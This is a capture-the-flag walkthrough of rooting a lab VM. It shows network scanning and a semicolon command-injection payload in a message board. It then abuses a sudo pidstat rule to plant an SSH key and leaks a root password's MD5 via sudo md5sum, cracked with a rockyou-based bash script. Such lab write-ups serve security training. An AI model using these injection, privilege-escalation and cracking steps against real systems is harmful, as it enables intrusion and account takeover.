Information gathering

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1	0a:00:27:00:00:11	(Unknown: locally administered)
192.168.31.2	08:00:27:77:9d:8a	PCS Systemtechnik GmbH
192.168.31.158	08:00:27:06:63:ee	PCS Systemtechnik GmbH
```

192.168.31.158 is the target's IP address.

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.158 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 01:26 EDT
Nmap scan report for 192.168.31.158
Host is up (0.00070s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:06:63:EE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds
```
Port 80 hosts a message board. After registering an account, posting `!mpstat` returns CPU statistics, but any other command is rejected, so the board apparently only whitelists the mpstat command by name. Appending a second command with a semicolon shows that the text after `!` is still handed to a shell unfiltered, and the chained command runs (so `|`, `&&` or `$( )` would work just as well):

```
!mpstat;id
Server: Linux 5.10.0-19-amd64 (MSG) 	04/24/25 	_x86_64_	(1 CPU)

05:30:02     CPU    %usr   %nice    %sys %iowait    %irq   %soft  %steal  %guest  %gnice   %idle
05:30:02     all    1.84    0.01    0.57    0.13    0.00    0.27    0.00    0.00    0.00   97.19
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Use the same injection to get a reverse shell back to the attack box; it runs as www-data.

Privilege escalation

Check what sudo allows with `sudo -l`:

```
www-data@MSG:~$ sudo -l
Matching Defaults entries for www-data on MSG:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on MSG:
    (messagemaster) NOPASSWD: /bin/pidstat
```
pidstat has an `-e` option that executes a program with the given arguments and monitors it, so whatever is passed to `-e` runs with pidstat's privileges. The rule only allows running pidstat as messagemaster, hence the `-u messagemaster`:

```
sudo -u messagemaster /bin/pidstat -e bash
```
bash started this way exits straight away, so instead use `pidstat -e` to plant an SSH public key: messagemaster's home directory has no `.ssh`, so first create the `.ssh` directory, then copy in a prepared `authorized_keys` file containing the attacker's public key. Because the commands run as messagemaster, the directory and file end up owned by that user, which is what sshd's StrictModes check requires (it ignores an `authorized_keys` that is group- or world-writable or owned by someone else).

Then log in as messagemaster over SSH with the matching private key.
Escalating to root

```
messagemaster@MSG:~$ sudo -l
Matching Defaults entries for messagemaster on MSG:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User messagemaster may run the following commands on MSG:
    (ALL) NOPASSWD: /bin/md5sum
```

messagemaster can run md5sum as root, and `/var/www` contains a root-owned file `ROOTPASS` that only root can read. `sudo md5sum /var/www/ROOTPASS` therefore leaks the MD5 of the file's contents, i.e. of the root password, which can be cracked offline against a wordlist:

```
messagemaster@MSG:/var/www$ ls -ll
total 8
drwxrwxr-- 5 www-data www-data 4096 Nov 18  2022 html
-rw-r----- 1 root     root       12 Nov 21  2022 ROOTPASS
```
ROOTPASS is 12 bytes, so the root password itself is 11 characters, because the file ends with a newline (this assumes ASCII and a single trailing `\n`). Start by pulling only the 11-character entries out of rockyou.txt:

```
grep -E "^.{11}$" /usr/share/wordlists/rockyou.txt > pass.txt
```
Then hash each line. `echo` appends a newline, so each MD5 is computed over the password plus `\n`, exactly the bytes md5sum saw when it read the file; hashing the bare password would never match. (`for i in $(cat ...)` word-splits on whitespace, which is fine here because the 11-character filter already excludes nothing with spaces of interest, but `while read -r` is the safer loop.)

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# for i in $(cat pass.txt);do echo $i|md5sum>>md5.txt ;done
```

(a bit slow, since it spawns one md5sum process per candidate)
Then use paste to join the hashes with the list they were computed from. That list is pass.txt, not rockyou.txt: md5.txt has one line per line of pass.txt, so pairing it with the full rockyou.txt would misalign every hash after the first entry that is not 11 characters long. Write the result to a new file rather than back into pass.txt, because the shell truncates the redirection target before paste reads it:

```
paste -d ':' md5.txt pass.txt > lookup.txt
```

Finally grep for the hash that `sudo md5sum /var/www/ROOTPASS` printed:

```
grep "85c73111b30f9ede8504bb4a4b682f48" lookup.txt
```

This gives the root password: Message5687.
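The whole offline step (filter by length, hash each candidate with its trailing newline, compare against the leaked digest) folded into one shell function, as an added example that is not part of the original writeup. It compares each candidate's digest directly instead of building a paste/grep lookup file, and it runs against a small constructed wordlist rather than rockyou.txt; the function names, file names and sample words are assumptions made for the example.

```bash
#!/bin/bash
# Added example: crack the md5sum of a password file whose contents are
# "<password>\n", as leaked by a root-privileged md5sum over the file.

# Derive the password length from the file size: a file written with a
# single trailing newline holds size-1 bytes of password (assumes ASCII).
expected_len() {
  echo $(( $1 - 1 ))
}

# Constructed sample wordlist standing in for rockyou.txt (hypothetical path).
make_sample_wordlist() {
  printf '%s\n' 'password' 'hello' 'Message1234' 'letmein' > "$1"
}

# crack_md5 TARGET_HEX WORDLIST LEN
# Prints the matching candidate and returns 0, or returns 1 if none matched.
crack_md5() {
  local target="$1" wordlist="$2" len="$3" cand hash
  while IFS= read -r cand; do
    # Only candidates of the right length can produce the leaked digest.
    [ "${#cand}" -eq "$len" ] || continue
    # printf '%s\n' reproduces the exact bytes of the file (password + newline);
    # hashing the bare password would never match the leaked md5sum.
    hash=$(printf '%s\n' "$cand" | md5sum | cut -d' ' -f1)
    if [ "$hash" = "$target" ]; then
      printf '%s\n' "$cand"
      return 0
    fi
  done < "$wordlist"
  return 1
}

# Usage (hypothetical values): the file was 12 bytes, the leaked digest is $1.
#   crack_md5 "$1" /usr/share/wordlists/rockyou.txt "$(expected_len 12)"
```

Like the original loop this spawns one md5sum per candidate, so for a full rockyou.txt run it is still slow; the same logic in Python with hashlib.md5 over `(pw + "\n").encode()` avoids the per-candidate process and finishes in seconds. The length filter matters for correctness as well as speed: without it, a wordlist entry of another length that happens to share a prefix would not be excluded by inspection, only by the hash comparison.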